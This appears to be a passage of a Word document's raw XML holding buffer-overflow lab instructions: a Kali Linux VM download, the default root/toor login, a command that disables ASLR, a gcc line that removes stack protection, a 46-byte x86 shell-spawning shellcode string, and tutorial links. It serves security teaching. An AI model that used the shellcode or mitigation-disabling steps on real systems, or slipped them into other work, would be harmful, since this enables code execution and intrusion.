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download the Virtual Machine Disk file and copy it to a pen drive for tomorrow's lab.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Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
            <w:color w:val="174ea6"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="white"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://old.kali.org/virtual-images/kali-2016.1/Kali-Linux-2016.1-vbox-i686.7z</w:t>
        </w:r>
      </w:hyperlink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Import the vbox file and install Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Username: root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Password: toor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Disable aslr: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echo 0 | sudo tee /proc/sys/kernel/randomize_va_space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 code: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example.c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compiling line is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gcc -o example -fno-stack-protector -m32 -z execstack example.c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46 byte shellcode (x86*) used in this program is - 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"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"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Tutorial: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https://medium.com/@sigkilla9/linux-buffer-overflows-46833345382b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rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto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exploit a buffer overflow vulnerability - Practical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rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto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Running a Buffer Overflow Attack - Computerphile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https://gist.github.com/apolloclark/6cffb33f179cc9162d0a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st.github.com/apolloclark/6cffb33f179cc9162d0a" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=1S0aBV-Waeo" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=hJ8IwyhqzD4" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://notifications.googleapis.com/email/redirect?t=AFG8qyWdXsqXabIMSBurvdT6CjXL-ymyPUIN6abR4BQXl9YElG_55li1e0UCi-wvvwHCZwq7mxOfaNk8tfjozoqfZkBgvH478w2mqujjGdSVpO-yDDOYMwd1jm8-Clv6yi5QCnkQUNQHEYV5gvcIDkMCvAp0WqYLGQAFT3dgmdDMTTzUptDUjIW_IvwdAMaL8zOPaxaB2DmjCK5O5i1qts2_u3zUx429vBDuhKEf6HBW5VElFR9vuRMun8ogqHFhuSs_0vrGRzzlJihEHW_9V8xkTa49yaFwWlsEicfyLRNFfrjDAWi4oqLfwdzeM1VpgbZn-isLJja4z3UaybLeREbl6Ya5V2Lcb1kkoKo7RgmeYtFYPJDq-houfys1OU-VQFu0phMoP4Z7guf_WhziWRsd1-wc__qABaUhsnSt6aDoEgeA--1ZLfEQRZOGqlin6T-3rJbF6ugxu0KCN00FaO4JesQdvQJzDKGnwSEKXpCP_3FS7zwRp6zubUOH0LocAXjZdHj5hkgUyUIvew8OVlRSB_DguPq7JpPoDZBf8osH0jpd1PpP3yCOxsPM8YOmg-XHpj75mhzZnqrlhZPaPQFH8opbd4mNhCQkOKb1n48ugd0stfY1516YjfdFq266PFW9XKiEA-qVi2CJrONdW7bY_S1FIhK3LDfftO1L12mJoyvBsNobUyy0uS7z7o3gKKojbILVzVgKpuIFAz6EqTJydy88rVpGQdTvrTfaEgaDeFRs-eKief7DngTDgnLgXwo8PL-bqGrTnVn_S_Da6YnpW-EGsHMsjRNdwMiIC2Ef730kNz56nJA-vF0MMsjiECWPfxDKWIinIWKU4Fmv4mKU5WZUeKz2mNgGBgjxmbusTS1HpDL9dqU-LcaPljkAWEA9B0-qHUxFz1edc3I1g4AMSpCBuYZ9Y_dcHtshLZwe1QQh-C_-Dxi0IPkeMbHe6J-2moFPvmpL2KQ-AwP006a-pcQq146O&amp;r=eJzLKCkpKLbS18_PSdHLTszJ1MsvStcvyywqKU3M0c3MTUxPLdYHiesaGRia6Rnqe4PYPpl5pRVQEd2ypPwK3UwzCzM98yoAL4sZlQ&amp;s=ALHZ2r5Fu-5KsgE-Oqj36oJqcT6T" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/0B8b0M2LATseXYWRiVHdkaGhwRjg/view?resourcekey=0-ZRMkh5rVq_hvXW6Nb-cb6A" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@sigkilla9/linux-buffer-overflows-46833345382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